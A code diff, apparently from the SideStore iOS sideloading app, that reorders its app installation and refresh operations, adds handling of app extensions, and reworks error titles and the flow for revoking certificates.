+                popoverPresentationController.sourceRect = CGRect(x: 50, y: 50, width: 4, height: 4)
+                popoverPresentationController.delegate = popoverContentController
+                
+                DispatchQueue.main.async {
+                    presentingViewController.present(popoverContentController, animated: true)
+                }
+            }
+            
+
+        })
+        
+        DispatchQueue.main.async {
+            presentingViewController.present(alertController, animated: true)
+        }
+    }
+    
     private func _install(_ app: AppProtocol, operation appOperation: AppOperation, group: RefreshGroup, context: InstallAppOperationContext? = nil, additionalEntitlements: [ALTEntitlement: Any]? = nil, cacheApp: Bool = true, completionHandler: @escaping (Result<InstalledApp, Error>) -> Void) -> Progress
     {
         let progress = Progress.discreteProgress(totalUnitCount: 100)
@@ -1024,7 +1204,81 @@ private extension AppManager
         }
         verifyOperation.addDependency(downloadOperation)
         
+        /* Remove App Extensions */
         
+        let removeAppExtensionsOperation = RSTAsyncBlockOperation { [weak self] (operation) in
+            do
+            {
+                if let error = context.error
+                {
+                    throw error
+                }
+/*
+                guard case .install = appOperation else {
+                    operation.finish()
+                    return
+                }
+*/
+                guard let extensions = context.app?.appExtensions else {
+                    throw OperationError.invalidParameters("AppManager._install.removeAppExtensionsOperation: context.app?.appExtensions is nil")
+                }
+                
+                guard let currentApp = context.app else {
+                    throw OperationError.invalidParameters("AppManager._install.removeAppExtensionsOperation: context.app is nil")
+                }
+                
+                
+                self?.removeAppExtensions(from: currentApp,
+                                          existingApp: app as? InstalledApp,
+                                          extensions: extensions,
+                                          context.authenticatedContext.presentingViewController
+                ) { result in
+                    switch result {
+                    case .success(): break
+                    case .failure(let error): context.error = error
+                    }
+                    operation.finish()
+                }
+                
+            }
+            catch
+            {
+                context.error = error
+                operation.finish()
+            }
+        }
+        
+        removeAppExtensionsOperation.addDependency(verifyOperation)
+        
+        
+        /* Refresh Anisette Data */
+        let refreshAnisetteDataOperation = FetchAnisetteDataOperation(context: group.context)
+        refreshAnisetteDataOperation.resultHandler = { (result) in
+            switch result
+            {
+            case .failure(let error): context.error = error
+            case .success(let anisetteData): group.context.session?.anisetteData = anisetteData
+            }
+        }
+        refreshAnisetteDataOperation.addDependency(removeAppExtensionsOperation)
+
+
+        /* Fetch Provisioning Profiles */
+        let fetchProvisioningProfilesOperation = FetchProvisioningProfilesOperation(context: context)
+        fetchProvisioningProfilesOperation.additionalEntitlements = additionalEntitlements
+        fetchProvisioningProfilesOperation.resultHandler = { (result) in
+            switch result
+            {
+            case .failure(let error): context.error = error
+            case .success(let provisioningProfiles): 
+                context.provisioningProfiles = provisioningProfiles
+                print("PROVISIONING PROFILES \(context.provisioningProfiles)")
+            }
+        }
+        fetchProvisioningProfilesOperation.addDependency(refreshAnisetteDataOperation)
+        progress.addChild(fetchProvisioningProfilesOperation.progress, withPendingUnitCount: 5)
+
+
         /* Deactivate Apps (if necessary) */
         let deactivateAppsOperation = RSTAsyncBlockOperation { [weak self] (operation) in
             do
@@ -1040,8 +1294,21 @@ private extension AppManager
                 {
                     throw error
                 }
+                
+                guard let profiles = context.provisioningProfiles else {
+                    throw OperationError.invalidParameters("AppManager._install.deactivateAppsOperation: context.provisioningProfiles is nil")
+                }
+                if !profiles.contains(where: { $1.isFreeProvisioningProfile == true }) {
+                    operation.finish()
+                    return
+                }
                                 
-                guard let app = context.app, let presentingViewController = context.authenticatedContext.presentingViewController else { throw OperationError.invalidParameters }
+                guard
+                    let app = context.app,
+                    let presentingViewController = context.authenticatedContext.presentingViewController
+                else {
+                    throw OperationError.invalidParameters("AppManager._install.deactivateAppsOperation: self.context.app or context.authenticatedContext.presentingViewController is nil")
+                }
                 
                 self?.deactivateApps(for: app, presentingViewController: presentingViewController) { result in
                     switch result
@@ -1059,8 +1326,7 @@ private extension AppManager
                 operation.finish()
             }
         }
-        deactivateAppsOperation.addDependency(verifyOperation)
-        
+        deactivateAppsOperation.addDependency(fetchProvisioningProfilesOperation)
         
         /* Patch App */
         let patchAppOperation = RSTAsyncBlockOperation { operation in
@@ -1081,7 +1347,9 @@ private extension AppManager
                     throw error
                 }
                 
-                guard let app = context.app else { throw OperationError.invalidParameters }
+                guard let app = context.app else {
+                    throw OperationError.invalidParameters("AppManager._install.patchAppOperation: context.app is nil")
+                }
                 
                 guard let isUntetherRequired = app.bundle.infoDictionary?[Bundle.Info.untetherRequired] as? Bool,
                       let minimumiOSVersionString = app.bundle.infoDictionary?[Bundle.Info.untetherMinimumiOSVersion] as? String,
@@ -1134,32 +1402,6 @@ private extension AppManager
         patchAppOperation.addDependency(deactivateAppsOperation)
         
         
-        /* Refresh Anisette Data */
-        let refreshAnisetteDataOperation = FetchAnisetteDataOperation(context: group.context)
-        refreshAnisetteDataOperation.resultHandler = { (result) in
-            switch result
-            {
-            case .failure(let error): context.error = error
-            case .success(let anisetteData): group.context.session?.anisetteData = anisetteData
-            }
-        }
-        refreshAnisetteDataOperation.addDependency(patchAppOperation)
-        
-        
-        /* Fetch Provisioning Profiles */
-        let fetchProvisioningProfilesOperation = FetchProvisioningProfilesOperation(context: context)
-        fetchProvisioningProfilesOperation.additionalEntitlements = additionalEntitlements
-        fetchProvisioningProfilesOperation.resultHandler = { (result) in
-            switch result
-            {
-            case .failure(let error): context.error = error
-            case .success(let provisioningProfiles): context.provisioningProfiles = provisioningProfiles
-            }
-        }
-        fetchProvisioningProfilesOperation.addDependency(refreshAnisetteDataOperation)
-        progress.addChild(fetchProvisioningProfilesOperation.progress, withPendingUnitCount: 5)
-        
-        
         /* Resign */
         let resignAppOperation = ResignAppOperation(context: context)
         resignAppOperation.resultHandler = { (result) in
@@ -1169,7 +1411,7 @@ private extension AppManager
             case .success(let resignedApp): context.resignedApp = resignedApp
             }
         }
-        resignAppOperation.addDependency(fetchProvisioningProfilesOperation)
+        resignAppOperation.addDependency(patchAppOperation)
         progress.addChild(resignAppOperation.progress, withPendingUnitCount: 20)
         
         
@@ -1212,7 +1454,7 @@ private extension AppManager
         progress.addChild(installOperation.progress, withPendingUnitCount: 30)
         installOperation.addDependency(sendAppOperation)
         
-        let operations = [downloadOperation, verifyOperation, deactivateAppsOperation, patchAppOperation, refreshAnisetteDataOperation, fetchProvisioningProfilesOperation, resignAppOperation, sendAppOperation, installOperation]
+        let operations = [downloadOperation, verifyOperation, removeAppExtensionsOperation, refreshAnisetteDataOperation, fetchProvisioningProfilesOperation, deactivateAppsOperation, patchAppOperation, resignAppOperation, sendAppOperation, installOperation]
         group.add(operations)
         self.run(operations, context: group.context)
         
@@ -1226,6 +1468,25 @@ private extension AppManager
         let context = AppOperationContext(bundleIdentifier: app.bundleIdentifier, authenticatedContext: group.context)
         context.app = ALTApplication(fileURL: app.fileURL)
         
+        
+        let validateAppExtensionsOperation = RSTAsyncBlockOperation {(op) in
+            
+            //App-Extensions: Ensure DB data and disk state must match
+            let dbAppEx: Set<InstalledExtension> = app.appExtensions
+            let diskAppEx: Set<ALTApplication> = context.app!.appExtensions
+            let diskAppExNames = diskAppEx.map { $0.bundleIdentifier }
+            let dbAppExNames = dbAppEx.map{ $0.bundleIdentifier }
+                
+            let isMatching = Set(dbAppExNames) == Set(diskAppExNames)
+            let errMessage = "AppManager.refresh: App Extensions in DB and Disk are matching: \(isMatching)\n"
+                           + "AppManager.refresh: dbAppEx: \(dbAppExNames); diskAppEx: \(String(describing: diskAppExNames))\n"
+            print(errMessage)
+            if(!isMatching){
+                completionHandler(.failure(OperationError.refreshAppFailed(message: errMessage)))
+            }
+            op.finish()
+        }
+        
         /* Fetch Provisioning Profiles */
         let fetchProvisioningProfilesOperation = FetchProvisioningProfilesOperation(context: context)
         fetchProvisioningProfilesOperation.resultHandler = { (result) in
@@ -1236,6 +1497,8 @@ private extension AppManager
             }
         }
         progress.addChild(fetchProvisioningProfilesOperation.progress, withPendingUnitCount: 60)
+        fetchProvisioningProfilesOperation.addDependency(validateAppExtensionsOperation)
+        
         
         /* Refresh */
         let refreshAppOperation = RefreshAppOperation(context: context)
@@ -1245,14 +1508,21 @@ private extension AppManager
             case .success(let installedApp):
                 completionHandler(.success(installedApp))
                 
-            case .failure(ALTServerError.unknownRequest), .failure(OperationError.appNotFound):
+            case .failure(MinimuxerError.ProfileInstall):
+                completionHandler(.failure(OperationError.noWiFi))
+                
+            case .failure(ALTServerError.unknownRequest), .failure(OperationError.appNotFound(name: app.name)):
                 // Fall back to installation if AltServer doesn't support newer provisioning profile requests,
                 // OR if the cached app could not be found and we may need to redownload it.
                 app.managedObjectContext?.performAndWait { // Must performAndWait to ensure we add operations before we return.
-                    let installProgress = self._install(app, operation: operation, group: group) { (result) in
-                        completionHandler(result)
+                    if minimuxer.ready() {
+                        let installProgress = self._install(app, operation: operation, group: group) { (result) in
+                            completionHandler(result)
+                        }
+                        progress.addChild(installProgress, withPendingUnitCount: 40)
+                    } else {
+                        completionHandler(.failure(OperationError.noWiFi))
                     }
-                    progress.addChild(installProgress, withPendingUnitCount: 40)
                 }
                 
             case .failure(let error):
@@ -1262,7 +1532,7 @@ private extension AppManager
         progress.addChild(refreshAppOperation.progress, withPendingUnitCount: 40)
         refreshAppOperation.addDependency(fetchProvisioningProfilesOperation)
         
-        let operations = [fetchProvisioningProfilesOperation, refreshAppOperation]
+        let operations = [validateAppExtensionsOperation, fetchProvisioningProfilesOperation, refreshAppOperation]
         group.add(operations)
         self.run(operations, context: group.context)
 
@@ -1519,7 +1789,7 @@ private extension AppManager
         }
         
         guard let application = ALTApplication(fileURL: app.fileURL) else {
-            completionHandler(.failure(OperationError.appNotFound))
+            completionHandler(.failure(OperationError.appNotFound(name: app.name)))
             return progress
         }
         
@@ -1531,8 +1801,8 @@ private extension AppManager
                     let temporaryDirectoryURL = context.temporaryDirectory.appendingPathComponent("AltBackup-" + UUID().uuidString)
                     try FileManager.default.createDirectory(at: temporaryDirectoryURL, withIntermediateDirectories: true, attributes: nil)
                     
-                    guard let altbackupFileURL = Bundle.main.url(forResource: "AltBackup", withExtension: "ipa") else { throw OperationError.appNotFound }
-                    
+                    guard let altbackupFileURL = Bundle.main.url(forResource: "AltBackup", withExtension: "ipa") else { throw OperationError.appNotFound(name: app.name) }
+
                     let unzippedAppBundleURL = try FileManager.default.unzipAppBundle(at: altbackupFileURL, toDirectory: temporaryDirectoryURL)
                     guard let unzippedAppBundle = Bundle(url: unzippedAppBundleURL) else { throw OperationError.invalidApp }
                     
@@ -1670,11 +1940,35 @@ private extension AppManager
             do { try installedApp.managedObjectContext?.save() }
             catch { print("Error saving installed app.", error) }
         }
-        catch
+        catch let nsError as NSError
         {
+            var appName: String!
+            if let app = operation.app as? (NSManagedObject & AppProtocol) {
+                if let context = app.managedObjectContext {
+                    context.performAndWait {
+                        appName = app.name
+                    }
+                } else {
+                    appName = NSLocalizedString("Unknown App", comment: "")
+                }
+            } else {
+                appName = operation.app.name
+            }
+
+            let localizedTitle: String
+            switch operation {
+            case .install: localizedTitle = String(format: NSLocalizedString("Failed to Install %@", comment: ""), appName)
+            case .refresh: localizedTitle = String(format: NSLocalizedString("Failed to Refresh %@", comment: ""), appName)
+            case .update: localizedTitle = String(format: NSLocalizedString("Failed to Update %@", comment: ""), appName)
+            case .activate: localizedTitle = String(format: NSLocalizedString("Failed to Activate %@", comment: ""), appName)
+            case .deactivate: localizedTitle = String(format: NSLocalizedString("Failed to Deactivate %@", comment: ""), appName)
+            case .backup: localizedTitle = String(format: NSLocalizedString("Failed to Backup %@", comment: ""), appName)
+            case .restore: localizedTitle = String(format: NSLocalizedString("Failed to Restore %@ Backup", comment: ""), appName)
+            }
+            let error = nsError.withLocalizedTitle(localizedTitle)
             group.set(.failure(error), forAppWithBundleIdentifier: operation.bundleIdentifier)
             
-            self.log(error, for: operation)
+            self.log(error, operation: operation.loggedErrorOperation, app: operation.app)
         }
     }
     
@@ -1691,8 +1985,8 @@ private extension AppManager
         let trigger = UNTimeIntervalNotificationTrigger(timeInterval: timeIntervalUntilNotification, repeats: false)
         
         let content = UNMutableNotificationContent()
-        content.title = NSLocalizedString("AltStore Expiring Soon", comment: "")
-        content.body = NSLocalizedString("AltStore will expire in 24 hours. Open the app and refresh it to prevent it from expiring.", comment: "")
+        content.title = NSLocalizedString("SideStore Expiring Soon", comment: "")
+        content.body = NSLocalizedString("SideStore will expire in 24 hours. Open the app and refresh it to prevent it from expiring.", comment: "")
         content.sound = .default
         
         let request = UNNotificationRequest(identifier: AppManager.expirationWarningNotificationID, content: content, trigger: trigger)
@@ -1702,7 +1996,7 @@ private extension AppManager
     func log(_ error: Error, for operation: AppOperation)
     {
         // Sanitize NSError on same thread before performing background task.
-        let sanitizedError = (error as NSError).sanitizedForCoreData()
+        let sanitizedError = (error as NSError).sanitizedForSerialization()
         
         let loggedErrorOperation: LoggedError.Operation = {
             switch operation

AltStore/Managing Apps/AppManagerErrors.swift

@@ -22,13 +22,27 @@ extension AppManager
         
         var managedObjectContext: NSManagedObjectContext?
         
-        var errorDescription: String? {
-            if let error = self.primaryError
-            {
-                return error.localizedDescription
+        var localizedTitle: String? {
+            var localizedTitle: String?
+            self.managedObjectContext?.performAndWait {
+                if self.sources?.count == 1 {
+                    localizedTitle = NSLocalizedString("Failed to refresh Store", comment: "")
+                } else if self.errors.count == 1 {
+                    guard let source = self.errors.keys.first else { return }
+                    localizedTitle = String(format: NSLocalizedString("Failed to refresh Source '%@'", comment: ""), source.name)
+                } else {
+                    localizedTitle = String(format: NSLocalizedString("Failed to refresh %@ Sources", comment: ""), NSNumber(value: self.errors.count))
+                }
             }
-            else
-            {
+            return localizedTitle
+        }
+
+        var errorDescription: String? {
+            if let error = self.primaryError {
+                return error.localizedDescription
+            } else if let error = self.errors.values.first, self.errors.count == 1 {
+                return error.localizedDescription
+            } else {
                 var localizedDescription: String?
                 
                 self.managedObjectContext?.performAndWait {
@@ -67,8 +81,14 @@ extension AppManager
         }
         
         var errorUserInfo: [String : Any] {
-            guard let error = self.errors.values.first, self.errors.count == 1 else { return [:] }
-            return [NSUnderlyingErrorKey: error]
+            let errors = Array(self.errors.values)
+            var userInfo = [String: Any]()
+            userInfo[ALTLocalizedTitleErrorKey] = self.localizedTitle
+            userInfo[NSUnderlyingErrorKey] = self.primaryError
+            if #available(iOS 14.5, *), !errors.isEmpty {
+                userInfo[NSMultipleUnderlyingErrorsKey] = errors
+            }
+            return userInfo
         }
         
         init(_ error: Error)

AltStore/News/NewsViewController.swift

@@ -313,9 +313,8 @@ private extension NewsViewController
                 {
                 case .failure(OperationError.cancelled): break // Ignore
                 case .failure(let error):
-                    let toastView = ToastView(error: error)
-                    toastView.show(in: self)
-                    
+                    ToastView(error: error, opensLog: true).show(in: self)
+
                 case .success: print("Installed app:", storeApp.bundleIdentifier)
                 }
                 
@@ -391,9 +390,9 @@ extension NewsViewController
             let progress = AppManager.shared.installationProgress(for: storeApp)
             footerView.bannerView.button.progress = progress
             
-            if let versionDate = storeApp.latestVersion?.date, versionDate > Date()
+            if let versionDate = storeApp.latestSupportedVersion?.date, versionDate > Date()
             {
-                footerView.bannerView.button.countdownDate = storeApp.versionDate
+                footerView.bannerView.button.countdownDate = versionDate
             }
             else
             {
@@ -426,6 +425,10 @@ extension NewsViewController: UICollectionViewDelegateFlowLayout
             return previousSize
         }
         
+        // Take layout margins into account.
+        self.prototypeCell.layoutMargins.left = self.view.layoutMargins.left
+        self.prototypeCell.layoutMargins.right = self.view.layoutMargins.right
+        
         let widthConstraint = self.prototypeCell.contentView.widthAnchor.constraint(equalToConstant: collectionView.bounds.width)
         NSLayoutConstraint.activate([widthConstraint])
         defer { NSLayoutConstraint.deactivate([widthConstraint]) }

AltStore/Operations/AuthenticationOperation.swift

@@ -7,13 +7,15 @@
 //
 
 import Foundation
-import Network
 import Roxas
+import Network
 
-import AltSign
 import AltStoreCore
+import AltSign
+import minimuxer
 
-enum AuthenticationError: LocalizedError
+typealias AuthenticationError = AuthenticationErrorCode.Error
+enum AuthenticationErrorCode: Int, ALTErrorEnum, CaseIterable
 {
     case noTeam
     case noCertificate
@@ -22,13 +24,11 @@ enum AuthenticationError: LocalizedError
     case missingPrivateKey
     case missingCertificate
     
-    var errorDescription: String?
-    {
-        switch self
-        {
-        case .noTeam: return NSLocalizedString("Developer team could not be found.", comment: "")
+    var errorFailureReason: String {
+        switch self {
+        case .noTeam: return NSLocalizedString("Your Apple ID has no developer teams?", comment: "")
+        case .noCertificate: return NSLocalizedString("The developer certificate could not be found.", comment: "")
         case .teamSelectorError: return NSLocalizedString("Error presenting team selector view.", comment: "")
-        case .noCertificate: return NSLocalizedString("Developer certificate could not be found.", comment: "")
         case .missingPrivateKey: return NSLocalizedString("The certificate's private key could not be found.", comment: "")
         case .missingCertificate: return NSLocalizedString("The certificate could not be found.", comment: "")
         }
@@ -84,8 +84,7 @@ final class AuthenticationOperation: ResultOperation<(ALTTeam, ALTCertificate, A
         }
                 
         // Sign In
-        self.signIn
-        { result in
+        self.signIn() { (result) in
             guard !self.isCancelled else { return self.finish(.failure(OperationError.cancelled)) }
             
             switch result
@@ -96,8 +95,7 @@ final class AuthenticationOperation: ResultOperation<(ALTTeam, ALTCertificate, A
                 self.progress.completedUnitCount += 1
                 
                 // Fetch Team
-                self.fetchTeam(for: account, session: session)
-                { result in
+                self.fetchTeam(for: account, session: session) { (result) in
                     guard !self.isCancelled else { return self.finish(.failure(OperationError.cancelled)) }
                     
                     switch result
@@ -108,8 +106,7 @@ final class AuthenticationOperation: ResultOperation<(ALTTeam, ALTCertificate, A
                         self.progress.completedUnitCount += 1
                         
                         // Fetch Certificate
-                        self.fetchCertificate(for: team, session: session)
-                        { result in
+                        self.fetchCertificate(for: team, session: session) { (result) in
                             guard !self.isCancelled else { return self.finish(.failure(OperationError.cancelled)) }
                             
                             switch result
@@ -120,8 +117,7 @@ final class AuthenticationOperation: ResultOperation<(ALTTeam, ALTCertificate, A
                                 self.progress.completedUnitCount += 1
                                        
                                 // Register Device
-                                self.registerCurrentDevice(for: team, session: session)
-                                { result in
+                                self.registerCurrentDevice(for: team, session: session) { (result) in
                                     guard !self.isCancelled else { return self.finish(.failure(OperationError.cancelled)) }
                                     
                                     switch result
@@ -131,8 +127,7 @@ final class AuthenticationOperation: ResultOperation<(ALTTeam, ALTCertificate, A
                                         self.progress.completedUnitCount += 1
                                         
                                         // Save account/team to disk.
-                                        self.save(team)
-                                        { result in
+                                        self.save(team) { (result) in
                                             guard !self.isCancelled else { return self.finish(.failure(OperationError.cancelled)) }
                                             
                                             switch result
@@ -140,8 +135,7 @@ final class AuthenticationOperation: ResultOperation<(ALTTeam, ALTCertificate, A
                                             case .failure(let error): self.finish(.failure(error))
                                             case .success:
                                                 // Must cache App IDs _after_ saving account/team to disk.
-                                                self.cacheAppIDs(team: team, session: session)
-                                                { result in
+                                                self.cacheAppIDs(team: team, session: session) { (result) in
                                                     let result = result.map { _ in (team, certificate, session) }
                                                     self.finish(result)
                                                 }
@@ -160,8 +154,7 @@ final class AuthenticationOperation: ResultOperation<(ALTTeam, ALTCertificate, A
     func save(_ altTeam: ALTTeam, completionHandler: @escaping (Result<Void, Error>) -> Void)
     {
         let context = DatabaseManager.shared.persistentContainer.newBackgroundContext()
-        context.performAndWait
-        {
+        context.performAndWait {
             do
             {
                 let account: Account
@@ -213,8 +206,7 @@ final class AuthenticationOperation: ResultOperation<(ALTTeam, ALTCertificate, A
         print("Finished authenticating with result:", result.error?.localizedDescription ?? "success")
         
         let context = DatabaseManager.shared.persistentContainer.newBackgroundContext()
-        context.perform
-        {
+        context.perform {
             do
             {
                 let (altTeam, altCertificate, session) = try result.get()
@@ -222,8 +214,8 @@ final class AuthenticationOperation: ResultOperation<(ALTTeam, ALTCertificate, A
                 guard
                     let account = Account.first(satisfying: NSPredicate(format: "%K == %@", #keyPath(Account.identifier), altTeam.account.identifier), in: context),
                     let team = Team.first(satisfying: NSPredicate(format: "%K == %@", #keyPath(Team.identifier), altTeam.identifier), in: context)
-                else { throw AuthenticationError.noTeam }
-                
+                else { throw AuthenticationError(.noTeam) }
+
                 // Account
                 account.isActiveAccount = true
                 
@@ -249,12 +241,11 @@ final class AuthenticationOperation: ResultOperation<(ALTTeam, ALTCertificate, A
                 }
                 
                 let activeAppsMinimumVersion = OperatingSystemVersion(majorVersion: 13, minorVersion: 3, patchVersion: 1)
-                if team.type == .free, ProcessInfo.processInfo.isOperatingSystemAtLeast(activeAppsMinimumVersion)
-                {
-                    UserDefaults.standard.activeAppsLimit = InstalledApp.freeAccountActiveAppsLimit
-                }
-                else
-                {
+                if team.type == .free, !UserDefaults.standard.isAppLimitDisabled, ProcessInfo().sparseRestorePatched {
+                    UserDefaults.standard.activeAppsLimit = ALTActiveAppsLimit
+                } else if UserDefaults.standard.isAppLimitDisabled, !ProcessInfo().sparseRestorePatched {
+                    UserDefaults.standard.activeAppsLimit = 10
+                } else {
                     UserDefaults.standard.activeAppsLimit = nil
                 }
                 
@@ -268,16 +259,14 @@ final class AuthenticationOperation: ResultOperation<(ALTTeam, ALTCertificate, A
                 Keychain.shared.signingCertificate = altCertificate.p12Data()
                 Keychain.shared.signingCertificatePassword = altCertificate.machineIdentifier
                 
-                self.showInstructionsIfNecessary
-                { _ in
+                self.showInstructionsIfNecessary() { (didShowInstructions) in
+                    
                     let signer = ALTSigner(team: altTeam, certificate: altCertificate)
                     // Refresh screen must go last since a successful refresh will cause the app to quit.
-                    self.showRefreshScreenIfNecessary(signer: signer, session: session)
-                    { _ in
+                    self.showRefreshScreenIfNecessary(signer: signer, session: session) { (didShowRefreshAlert) in
                         super.finish(result)
                         
-                        DispatchQueue.main.async
-                        {
+                        DispatchQueue.main.async {
                             self.navigationController.dismiss(animated: true, completion: nil)
                         }
                     }
@@ -287,8 +276,7 @@ final class AuthenticationOperation: ResultOperation<(ALTTeam, ALTCertificate, A
             {
                 super.finish(result)
                 
-                DispatchQueue.main.async
-                {
+                DispatchQueue.main.async {
                     self.navigationController.dismiss(animated: true, completion: nil)
                 }
             }
@@ -308,7 +296,7 @@ private extension AuthenticationOperation
         {
             guard presentingViewController.presentedViewController == nil else { return false }
             
-            self.navigationController.setViewControllers([viewController], animated: false)
+            self.navigationController.setViewControllers([viewController], animated: false)            
             presentingViewController.present(self.navigationController, animated: true, completion: nil)
         }
         else
@@ -327,16 +315,14 @@ private extension AuthenticationOperation
     {
         func authenticate()
         {
-            DispatchQueue.main.async
-            {
+            DispatchQueue.main.async {
                 let authenticationViewController = self.storyboard.instantiateViewController(withIdentifier: "authenticationViewController") as! AuthenticationViewController
-                authenticationViewController.authenticationHandler = { appleID, password, completionHandler in
-                    self.authenticate(appleID: appleID, password: password)
-                    { result in
+                authenticationViewController.authenticationHandler = { (appleID, password, completionHandler) in
+                    self.authenticate(appleID: appleID, password: password) { (result) in
                         completionHandler(result)
                     }
                 }
-                authenticationViewController.completionHandler = { result in
+                authenticationViewController.completionHandler = { (result) in
                     if let (account, session, password) = result
                     {
                         // We presented the Auth UI and the user signed in.
@@ -361,8 +347,7 @@ private extension AuthenticationOperation
         
         if let appleID = Keychain.shared.appleIDEmailAddress, let password = Keychain.shared.appleIDPassword
         {
-            self.authenticate(appleID: appleID, password: password)
-            { result in
+            self.authenticate(appleID: appleID, password: password) { (result) in
                 switch result
                 {
                 case .success((let account, let session)):
@@ -388,7 +373,7 @@ private extension AuthenticationOperation
         self.appleIDEmailAddress = appleID
         
         let fetchAnisetteDataOperation = FetchAnisetteDataOperation(context: self.context)
-        fetchAnisetteDataOperation.resultHandler = { result in
+        fetchAnisetteDataOperation.resultHandler = { (result) in
             switch result
             {
             case .failure(let error): completionHandler(.failure(error))
@@ -397,12 +382,10 @@ private extension AuthenticationOperation
                 
                 if let presentingViewController = self.presentingViewController
                 {
-                    verificationHandler = { completionHandler in
-                        DispatchQueue.main.async
-                        {
+                    verificationHandler = { (completionHandler) in
+                        DispatchQueue.main.async {
                             let alertController = UIAlertController(title: NSLocalizedString("Please enter the 6-digit verification code that was sent to your Apple devices.", comment: ""), message: nil, preferredStyle: .alert)
-                            alertController.addTextField
-                            { textField in
+                            alertController.addTextField { (textField) in
                                 textField.autocorrectionType = .no
                                 textField.autocapitalizationType = .none
                                 textField.keyboardType = .numberPad
@@ -410,8 +393,7 @@ private extension AuthenticationOperation
                                 NotificationCenter.default.addObserver(self, selector: #selector(AuthenticationOperation.textFieldTextDidChange(_:)), name: UITextField.textDidChangeNotification, object: textField)
                             }
                             
-                            let submitAction = UIAlertAction(title: NSLocalizedString("Continue", comment: ""), style: .default)
-                            { _ in
+                            let submitAction = UIAlertAction(title: NSLocalizedString("Continue", comment: ""), style: .default) { (action) in
                                 let textField = alertController.textFields?.first
                                 
                                 let code = textField?.text ?? ""
@@ -421,8 +403,7 @@ private extension AuthenticationOperation
                             alertController.addAction(submitAction)
                             self.submitCodeAction = submitAction
                             
-                            alertController.addAction(UIAlertAction(title: RSTSystemLocalizedString("Cancel"), style: .cancel)
-                            { _ in
+                            alertController.addAction(UIAlertAction(title: RSTSystemLocalizedString("Cancel"), style: .cancel) { (action) in
                                 completionHandler(nil)
                             })
                             
@@ -444,15 +425,14 @@ private extension AuthenticationOperation
                 }
                     
                 ALTAppleAPI.shared.authenticate(appleID: appleID, password: password, anisetteData: anisetteData,
-                                                verificationHandler: verificationHandler)
-                { account, session, error in
+                                                verificationHandler: verificationHandler) { (account, session, error) in
                     if let account = account, let session = session
                     {
                         completionHandler(.success((account, session)))
                     }
                     else
                     {
-                        completionHandler(.failure(error ?? OperationError.unknown))
+                        completionHandler(.failure(error ?? OperationError.unknown()))
                     }
                 }
             }
@@ -464,43 +444,34 @@ private extension AuthenticationOperation
     func fetchTeam(for account: ALTAccount, session: ALTAppleAPISession, completionHandler: @escaping (Result<ALTTeam, Swift.Error>) -> Void)
     {
         func selectTeam(from teams: [ALTTeam])
-        {
-            if teams.count <= 1
-            {
-                if let team = teams.first
-                {
-                    return completionHandler(.success(team))
-                }
-                else
-                {
-                    return completionHandler(.failure(AuthenticationError.noTeam))
-                }
-            }
-            else
-            {
-                DispatchQueue.main.async
-                {
-                    let selectTeamViewController = self.storyboard.instantiateViewController(withIdentifier: "selectTeamViewController") as! SelectTeamViewController
+         {
+             if teams.count <= 1 {
+                 if let team = teams.first {
+                     return completionHandler(.success(team))
+                 } else {
+                     return completionHandler(.failure(AuthenticationError(.noTeam)))
+                 }
+             } else {
+                 DispatchQueue.main.async {
+                     let selectTeamViewController = self.storyboard.instantiateViewController(withIdentifier: "selectTeamViewController") as! SelectTeamViewController
 
-                    selectTeamViewController.teams = teams
-                    selectTeamViewController.completionHandler = completionHandler
+                     selectTeamViewController.teams = teams
+                     selectTeamViewController.completionHandler = completionHandler
 
-                    if !self.present(selectTeamViewController)
-                    {
-                        return completionHandler(.failure(AuthenticationError.noTeam))
-                    }
-                }
-            }
-        }
+                     if !self.present(selectTeamViewController)
+                     {
+                         return completionHandler(.failure(AuthenticationError(.noTeam)))
+                     }
+                 }
+             }
+         }
 
-        ALTAppleAPI.shared.fetchTeams(for: account, session: session)
-        { teams, error in
+        ALTAppleAPI.shared.fetchTeams(for: account, session: session) { (teams, error) in
             switch Result(teams, error)
             {
             case .failure(let error): completionHandler(.failure(error))
             case .success(let teams):
-                DatabaseManager.shared.persistentContainer.performBackgroundTask
-                { context in
+                DatabaseManager.shared.persistentContainer.performBackgroundTask { (context) in
                     if let activeTeam = DatabaseManager.shared.activeTeam(in: context), let altTeam = teams.first(where: { $0.identifier == activeTeam.identifier })
                     {
                         completionHandler(.success(altTeam))
@@ -518,24 +489,20 @@ private extension AuthenticationOperation
     {
         func requestCertificate()
         {
-            let machineName = "AltStore - " + UIDevice.current.name
-            ALTAppleAPI.shared.addCertificate(machineName: machineName, to: team, session: session)
-            { certificate, error in
+            let machineName: String = "SideStore - \(team.account.firstName)'s \(UIDevice.current.name)"
+            ALTAppleAPI.shared.addCertificate(machineName: machineName, to: team, session: session) { (certificate, error) in
                 do
                 {
                     let certificate = try Result(certificate, error).get()
-                    guard let privateKey = certificate.privateKey else { throw AuthenticationError.missingPrivateKey }
-                    
-                    ALTAppleAPI.shared.fetchCertificates(for: team, session: session)
-                    { certificates, error in
+                    guard let privateKey = certificate.privateKey else { throw AuthenticationError(.missingPrivateKey) }
+
+                    ALTAppleAPI.shared.fetchCertificates(for: team, session: session) { (certificates, error) in
                         do
                         {
                             let certificates = try Result(certificates, error).get()
                             
-                            guard let certificate = certificates.first(where: { $0.serialNumber == certificate.serialNumber })
-                            else
-                            {
-                                throw AuthenticationError.missingCertificate
+                            guard let certificate = certificates.first(where: { $0.serialNumber == certificate.serialNumber }) else {
+                                throw AuthenticationError(.missingCertificate)
                             }
                             
                             certificate.privateKey = privateKey
@@ -556,23 +523,55 @@ private extension AuthenticationOperation
         
         func replaceCertificate(from certificates: [ALTCertificate])
         {
-            guard let certificate = certificates.first(where: { $0.machineName?.starts(with: "AltStore") == true }) ?? certificates.first else { return completionHandler(.failure(AuthenticationError.noCertificate)) }
+            let ourCertificates = certificates.filter { a in
+                a.machineName?.starts(with: "SideStore") == true || a.machineName?.starts(with: "AltStore") == true
+            }
             
-            ALTAppleAPI.shared.revoke(certificate, for: team, session: session)
-            { success, error in
-                if let error = error, !success
+            if ourCertificates.isEmpty {
+                return requestCertificate()
+            }
+            
+            // We don't have private keys for any of the certificates,
+            // so we need to revoke one and create a new one.
+            var certsText = ""
+            for certificate in ourCertificates {
+                if let name = certificate.machineName {
+                    certsText.append("\(name)\n")
+                }
+            }
+            
+            let alertController = UIAlertController(title: NSLocalizedString("Would you like to revoke your previous certificates?\n\(certsText)", comment: ""), message: nil, preferredStyle: .alert)
+            
+            let noAction = UIAlertAction(title: NSLocalizedString("No", comment: ""), style: .default) { (action) in
+                requestCertificate()
+            }
